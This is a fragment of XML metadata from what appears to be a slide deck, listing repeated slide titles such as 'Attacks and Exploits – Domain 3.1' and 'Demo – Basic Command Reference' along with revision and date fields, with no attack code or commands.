      <vt:lpstr>Attacks and Exploits – Domain 3.1</vt:lpstr>
      <vt:lpstr>Attacks and Exploits – Domain 3.1</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>Demo – Basic Command Reference</vt:lpstr>
      <vt:lpstr>Demo – Basic Command Reference</vt:lpstr>
      <vt:lpstr>Demo – Basic Command Reference</vt:lpstr>
      <vt:lpstr>Attacks and Exploits – Domain 3.1</vt:lpstr>
      <vt:lpstr>Attacks and Exploits – Domain 3.1</vt:lpstr>
      <vt:lpstr>Attacks and Exploits – Domain 3.1</vt:lpstr>
      <vt:lpstr>Attacks and Exploits – Domain 3.1</vt:lpstr>
      <vt:lpstr>VIDEO</vt:lpstr>
      <vt:lpstr>Chat Question</vt:lpstr>
      <vt:lpstr>Attacks and Exploits – Domain 3.1</vt:lpstr>
      <vt:lpstr>Attacks and Exploits – Domain 3.1</vt:lpstr>
      <vt:lpstr>Attacks and Exploits – Domain 3.1</vt:lpstr>
      <vt:lpstr>Attacks and Exploits – Domain 3.1</vt:lpstr>
      <vt:lpstr>Attacks and Exploits – Domain 3.1</vt:lpstr>
      <vt:lpstr>Attacks and Exploits – Domain 3.2</vt:lpstr>
      <vt:lpstr>Attacks and Exploits – Domain 3.2</vt:lpstr>
      <vt:lpstr>Attacks and Exploits – Domain 3.2</vt:lpstr>
      <vt:lpstr>Attacks and Exploits – Domain 3.2</vt:lpstr>
      <vt:lpstr>DEMO</vt:lpstr>
      <vt:lpstr>Demo – Basic Command Reference</vt:lpstr>
      <vt:lpstr>Demo – Basic Command Reference</vt:lpstr>
      <vt:lpstr>Attacks and Exploits – Domain 3.2</vt:lpstr>
      <vt:lpstr>Attacks and Exploits – Domain 3.2</vt:lpstr>
      <vt:lpstr>Attacks and Exploits – Domain 3.2</vt:lpstr>
      <vt:lpstr>Attacks and Exploits – Domain 3.2</vt:lpstr>
      <vt:lpstr>Attacks and Exploits – Domain 3.2</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239</cp:revision>
  <cp:lastPrinted>2013-07-30T16:42:49Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-04-12T23:12:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-06-13T03:38:21Z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